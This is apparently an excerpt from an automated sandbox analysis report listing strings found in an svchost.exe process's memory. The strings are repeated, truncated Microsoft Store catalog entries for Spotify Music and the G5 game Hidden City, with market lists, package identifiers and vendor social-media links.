              Source: svchost.exe, 00000017.00000003.504998305.0000013EC0B7E000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
              Source: svchost.exe, 00000017.00000003.505052140.0000013EC0B1F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","/m equals www.facebook.com (Facebook)
              Source: svchost.exe, 00000017.00000003.505052140.0000013EC0B1F000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","/m equals www.twitter.com (Twitter)
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Game","Validatio
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Game","Validatio
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Game","Validatio
              Source: svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":423919743,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6","PackageId":"f29b0636-abdc-7df5-2edc-8f3e01650a1f-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
              Source: svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":423919743,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6","PackageId":"f29b0636-abdc-7df5-2edc-8f3e01650a1f-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
              Source: svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmpString found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":423919743,"PackageFormat":"EAppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6","PackageId":"f29b0636-abdc-7df5-2edc-8f3e01650a1f-X86","PackageRank":30011,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Xbox"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.36.3600.70_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"platf
              Source: svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey 